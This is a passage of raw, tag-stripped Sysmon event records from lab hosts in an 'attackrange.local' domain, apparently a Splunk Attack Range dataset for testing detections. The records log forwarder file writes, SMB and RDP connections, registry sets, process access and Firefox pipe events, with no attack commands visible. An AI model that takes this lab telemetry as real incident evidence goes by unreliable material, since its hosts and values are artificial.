Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5108EDF48AE8798ACE9008C936792642,SHA256=AF28F4E3A40ABA027E4CD5C13B37F7E00A5E1993C40E0BC45EA31F4F98A355C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.647{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF5A988F22E2FE380041A6D6594F0A18,SHA256=BA647D26A13F00FBEE6FE2F7FA5621C7E3C21636CF3B01F1A618E20C53217632,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:59.840{0C1E0330-048D-60E8-0100-00000000D001}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57506-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal445microsoft-ds 23542300x8000000000000000810982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:01.047{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA8FA89748C2E853DAA836AA5ED7BEAE,SHA256=0464573E72D8B138BAEFB83525A4CEE421644F31FD82D133122A8F8315AEE797,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.234{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net3497-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001055722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.211{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57506-false10.0.1.14win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001055737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:02.647{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBE665C234C8EC9D96AD24D34C19CBB0,SHA256=A0E9221EBF3C9E31265C47565403FC2DA0BBC035BFBAE17AFDF4ACD8883761E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:02.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A2587EDBEEAEE2F80F84FDC4CAB54E,SHA256=FF01EDDAF01A8878B9A2E251EFBCF95AB77A6E3977007A534CCE60CDDC195A84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:03.662{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A42ADB57ADBB5EE2EE8C978C193604D6,SHA256=D4A0C00D894FF4726AF76A8D0C6F39A33194273402A51AE7F1E80CDC95776429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:03.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB4C7DB026E9C65897CCFDDE2CDAC103,SHA256=7D6D3C437278CA811FF5EFC031A01EE2F27DFF28C770CB30C945F438C2F34676,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:04.678{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16526C6EBFE1366B0F176E47D32BFD1D,SHA256=F0ED1A343B516C5B10E35DBBFC092FAB24E372A4627B512945149A84DEFBE7ED,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000810996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000810995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f734485) 13241300x8000000000000000810994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ed-0x139be8c5) 13241300x8000000000000000810993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f5-0x756050c5) 13241300x8000000000000000810992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0xd724b8c5) 13241300x8000000000000000810991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000810990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f734485) 13241300x8000000000000000810989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776ed-0x139be8c5) 13241300x8000000000000000810988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f5-0x756050c5) 13241300x8000000000000000810987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0xd724b8c5) 23542300x8000000000000000810986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:04.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98EE4A46DD15E498BAD7A772AE48C134,SHA256=C1305DC50B57CCE67C97B9A5029559F28596ADF69DE96E36723122EB6516295B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:05.692{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C75B70C6472AEA73BC876B2DBF8D0C,SHA256=0A180BE71B3A884E4BFFE87035020A2A2DC2C09D550C80F6E09998FFAF524DD6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:04.368{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57507-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:05.281{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFB6A8885F792180CD9392A6693CB57E,SHA256=342C385C6CAD42E54B99ED33B211FE9DA6A34A42AF8DF1D11B1502A63F689B7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:06.761{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A58976F4652293AAD388DA799EDF2D17,SHA256=05E6CE0165F38947E64C18760799D664D828126D0049D0137BF732805489E3A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:06.295{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8DC8EDFF49B152429909FDC99E5ECA8,SHA256=1AD5D75D701122D2413DAB244CCCBA0BFD07BCF3F8FF86D7B6D98271644860CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:57.685{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62017-false10.0.1.12-8000- 23542300x80000000000000001055745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:06.576{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:06.529{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001055743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:06.529{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001055742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:11:06.529{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1220.102603015C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001055741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:11:06.529{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1220.102603015C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001055748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:07.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B316B548A0C8F089A03251B45F763FB0,SHA256=B8AB85873D9D93F6F1F7CCBCF50CF60CF5C410C60E58C893BFF73B3FBA5762E5,IMPHASH=00000000000000000000000000000000falsetrue 734700x8000000000000000811012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.672{0C1E0330-F91B-60EB-F879-00000000D001}4008C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x8000000000000000811011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 